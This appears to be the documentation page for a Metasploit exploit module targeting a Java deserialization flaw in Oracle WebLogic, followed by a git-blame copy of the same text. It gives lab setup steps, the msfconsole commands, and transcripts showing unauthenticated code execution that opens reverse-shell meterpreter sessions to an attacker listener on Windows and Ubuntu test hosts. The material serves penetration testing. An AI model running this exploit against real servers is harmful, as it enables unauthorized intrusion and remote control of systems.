documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md

## Vulnerable Application

  There exists a Java object deserialization vulnerability
  in multiple versions of WebLogic.

  Unauthenticated remote code execution can be achieved
  by sending a serialized `BadAttributeValueExpException` object
  over the T3 protocol to vulnerable WebLogic servers.

  This module has been tested against versions `v12.1.3.0.0`,
  `v12.2.1.3.0`, and `v12.2.1.4.0`.

  WebLogic versions can be downloaded from [here](https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html).

### Installation

  Some version of Java 8 JDK is required to be installed on the server.
  This module has been tested successfully using jdk8u202 and [jdk8u251](https://www.oracle.com/java/technologies/javase-jdk8-downloads.html).

  Installation instructions for WebLogic can be found [here](https://docs.oracle.com/cd/E24705_01/doc.91/e21052/appx_install_wls.htm#EOPWC376).

  On step 10 of the installation instructions, keep the
  `Run Quickstart` box checked and click `done`. A new window
  should pop up. Select `Create a new domain` -> `next`.
  Ensure `Basic WebLogic Server Domain` is selected and click `next`.
  Create credentials and select `next`. Domain mode can be either
  `Production` or `Development`, then click `next`. Click `next` again
  and select `Create`. Click `next` a couple more times, then click
  `finish`.

  To start WebLogic, execute the `startWebLogic` script in
  `Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/`.

## Verification Steps

- [ ] Install the application
- [ ] Start msfconsole
- [ ] Do: ```use exploit/multi/misc/weblogic_deserialize_badattrval```
- [ ] Do: ```set RHOSTS <ip>```
- [ ] Do: ```run```
- [ ] You should get a meterpreter session.

## Scenarios
### WebLogic `v12.2.1.4` on Windows 10

  ```
  msf5 > use exploit/multi/misc/weblogic_deserialize_badattrval
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.185
  rhosts => 172.16.215.185
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set lhost 172.16.215.1
  lhost => 172.16.215.1
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run

  [*] Started reverse TCP handler on 172.16.215.1:4444
  [*] 172.16.215.185:7001 - WebLogic version detected: 12.2.1.4.0
  [*] 172.16.215.185:7001 - Sending handshake...
  [*] 172.16.215.185:7001 - Formatting payload...
  [*] 172.16.215.185:7001 - Sending object...
  [*] Sending stage (176195 bytes) to 172.16.215.185
  [*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.185:50795) at 2020-05-15 09:37:45 -0500

  meterpreter > getuid
  Server username: DESKTOP-AQT4EG1\space
  meterpreter > sysinfo
  Computer        : DESKTOP-AQT4EG1
  OS              : Windows 10 (10.0 Build 18362).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 4
  Meterpreter     : x86/windows
  ```

### WebLogic `v12.1.3.0.0` on Ubuntu 18.04 Linux

  ```
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1
  target => 1
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196
  rhosts => 172.16.215.196
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run

  [*] Started reverse TCP handler on 172.16.215.1:4444 
  [*] 172.16.215.196:7001 - WebLogic version detected: 12.1.3.0.0
  [*] 172.16.215.196:7001 - Sending handshake...
  [*] 172.16.215.196:7001 - Formatting payload...
  [*] 172.16.215.196:7001 - Sending object...
  [*] Sending stage (3012516 bytes) to 172.16.215.196
  [*] Meterpreter session 6 opened (172.16.215.1:4444 -> 172.16.215.196:60672) at 2020-05-15 09:41:17 -0500
  [*] 172.16.215.196:7001 - Command Stager progress - 101.36% done (820/809 bytes)

  meterpreter > getuid
  Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
  meterpreter > sysinfo
  Computer     : 172.16.215.196
  OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  ```
add documentation, remove some leftover comments 2020-05-15 09:44:45 -05:00			`## Vulnerable Application`

Update documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md 2020-05-19 12:18:29 -05:00			`There exists a Java object deserialization vulnerability`
add documentation, remove some leftover comments 2020-05-15 09:44:45 -05:00			`in multiple versions of WebLogic.`

			`Unauthenticated remote code execution can be achieved`
Update documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md 2020-05-19 12:18:38 -05:00			by sending a serialized `BadAttributeValueExpException` object
			`over the T3 protocol to vulnerable WebLogic servers.`
add documentation, remove some leftover comments 2020-05-15 09:44:45 -05:00
			This module has been tested against versions `v12.1.3.0.0`,
			`v12.2.1.3.0`, and `v12.2.1.4.0`.

			`WebLogic versions can be downloaded from [here](https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html).`
remove eol spaces from doc 2020-05-19 14:52:34 -05:00
add documentation, remove some leftover comments 2020-05-15 09:44:45 -05:00			`### Installation`

Update documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md 2020-05-19 12:18:46 -05:00			`Some version of Java 8 JDK is required to be installed on the server.`
add jdk info 2020-05-15 10:16:26 -05:00			`This module has been tested successfully using jdk8u202 and [jdk8u251](https://www.oracle.com/java/technologies/javase-jdk8-downloads.html).`
remove eol spaces from doc 2020-05-19 14:52:34 -05:00
add jdk info 2020-05-15 10:16:26 -05:00			`Installation instructions for WebLogic can be found [here](https://docs.oracle.com/cd/E24705_01/doc.91/e21052/appx_install_wls.htm#EOPWC376).`
remove eol spaces from doc 2020-05-19 14:52:34 -05:00
Update documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md 2020-05-19 12:18:58 -05:00			`On step 10 of the installation instructions, keep the`
add documentation, remove some leftover comments 2020-05-15 09:44:45 -05:00			`Run Quickstart` box checked and click `done`. A new window
			should pop up. Select `Create a new domain` -> `next`.
			Ensure `Basic WebLogic Server Domain` is selected and click `next`.
			Create credentials and select `next`. Domain mode can be either
Update documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md 2020-05-19 12:19:05 -05:00			`Production` or `Development`, then click `next`. Click `next` again
add documentation, remove some leftover comments 2020-05-15 09:44:45 -05:00			and select `Create`. Click `next` a couple more times, then click
			`finish`.

fix docs 2020-05-19 12:25:56 -05:00			To start WebLogic, execute the `startWebLogic` script in
add documentation, remove some leftover comments 2020-05-15 09:44:45 -05:00			`Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/`.

			`## Verification Steps`

add jdk info 2020-05-15 10:16:26 -05:00			`- [ ] Install the application`
			`- [ ] Start msfconsole`
			- [ ] Do: ```use exploit/multi/misc/weblogic_deserialize_badattrval```
			- [ ] Do: ```set RHOSTS <ip>```
			- [ ] Do: ```run```
			`- [ ] You should get a meterpreter session.`
add documentation, remove some leftover comments 2020-05-15 09:44:45 -05:00
			`## Scenarios`
			### WebLogic `v12.2.1.4` on Windows 10

			```
			`msf5 > use exploit/multi/misc/weblogic_deserialize_badattrval`
			`msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.185`
			`rhosts => 172.16.215.185`
			`msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set lhost 172.16.215.1`
			`lhost => 172.16.215.1`
			`msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run`

			`[*] Started reverse TCP handler on 172.16.215.1:4444`
			`[*] 172.16.215.185:7001 - WebLogic version detected: 12.2.1.4.0`
			`[*] 172.16.215.185:7001 - Sending handshake...`
			`[*] 172.16.215.185:7001 - Formatting payload...`
			`[*] 172.16.215.185:7001 - Sending object...`
			`[*] Sending stage (176195 bytes) to 172.16.215.185`
			`[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.185:50795) at 2020-05-15 09:37:45 -0500`

			`meterpreter > getuid`
			`Server username: DESKTOP-AQT4EG1\space`
			`meterpreter > sysinfo`
			`Computer : DESKTOP-AQT4EG1`
			`OS : Windows 10 (10.0 Build 18362).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 4`
			`Meterpreter : x86/windows`
			```

fix docs 2020-05-19 12:25:56 -05:00			### WebLogic `v12.1.3.0.0` on Ubuntu 18.04 Linux
remove eol spaces from doc 2020-05-19 14:52:34 -05:00
add documentation, remove some leftover comments 2020-05-15 09:44:45 -05:00			```
			`msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1`
			`target => 1`
			`msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp`
			`payload => linux/x64/meterpreter/reverse_tcp`
			`msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196`
			`rhosts => 172.16.215.196`
			`msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run`

			`[*] Started reverse TCP handler on 172.16.215.1:4444`
			`[*] 172.16.215.196:7001 - WebLogic version detected: 12.1.3.0.0`
			`[*] 172.16.215.196:7001 - Sending handshake...`
			`[*] 172.16.215.196:7001 - Formatting payload...`
			`[*] 172.16.215.196:7001 - Sending object...`
			`[*] Sending stage (3012516 bytes) to 172.16.215.196`
			`[*] Meterpreter session 6 opened (172.16.215.1:4444 -> 172.16.215.196:60672) at 2020-05-15 09:41:17 -0500`
			`[*] 172.16.215.196:7001 - Command Stager progress - 101.36% done (820/809 bytes)`

			`meterpreter > getuid`
			`Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)`
			`meterpreter > sysinfo`
			`Computer : 172.16.215.196`
			`OS : Ubuntu 18.04 (Linux 4.18.0-15-generic)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			```